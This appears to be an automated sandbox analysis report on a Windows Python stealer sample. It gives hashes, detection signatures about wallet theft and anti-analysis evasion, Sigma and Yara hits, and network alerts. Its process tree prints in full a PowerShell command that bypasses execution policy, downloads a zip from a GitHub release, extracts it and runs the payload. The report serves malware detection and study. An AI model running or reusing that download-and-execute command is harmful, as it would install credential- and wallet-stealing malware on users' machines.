Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
| Sample name: | file.exe |
| Analysis ID: | 1564834 |
| MD5: | 1ca29f32c02f847a6a2ce55775f92a8e |
| SHA1: | e98c84e034dbddb83dc9f6f2b56bd8332b9445e1 |
| SHA256: | f607c51e418a43318045be784be9f311f77625931cc6ae17f39fb6c698cbee2e |
| Tags: | exeuser-Bitsight |
| Infos: |   |
 | |
Detection
Python Stealer
| Score: | 76 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Bypasses PowerShell execution policy
Creates files with lurking names (e.g. Crack.exe)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Yara detected Generic Python Stealer
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
file.exe (PID: 6504 cmdline: "C:\Users\ user\Deskt op\file.ex e" MD5: 1CA29F32C02F847A6A2CE55775F92A8E) 
powershell.exe (PID: 4592 cmdline: powershell .exe -Comm and "Set-E xecutionPo licy Bypas s -Scope P rocess -Fo rce; Invok e-WebReque st -Uri 'h ttps://git hub.com/di rectuser/m nemonic-ch ecker/rele ases/downl oad/1/aird rops.zip' -OutFile \ "$env:APPD ATA\\file. zip\"; Exp and-Archiv e -Path \" $env:APPDA TA\\file.z ip\" -Dest inationPat h \"$env:A PPDATA\\ex tracted\"; Remove-It em -Path \ "$env:APPD ATA\\file. zip\"; Sta rt-Process \"$env:AP PDATA\\ext racted\\ai rdrops.exe \"" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 7092 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - airdrops.exe (PID: 3628 cmdline:
"C:\Users\ user\AppDa ta\Roaming \extracted \airdrops. exe" MD5: 1188DC1186CAFDBCAC6A8C6B02BE4841)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security | ||
| JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security | ||
| JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security | ||
| JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security | ||
| JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security | ||
| Click to see the 4 entries | ||||
System Summary |   |
|---|
| Source: | Author: Subhash Popuri (@pbssubhash): | ||
| Source: | Author: frack113: | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-28T20:08:42.278181+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49820 | 13.107.246.63 | 443 | TCP |
| 2024-11-28T20:08:42.317174+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49819 | 13.107.246.63 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Joe Sandbox ML: | ||
| Source: | Static PE information: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||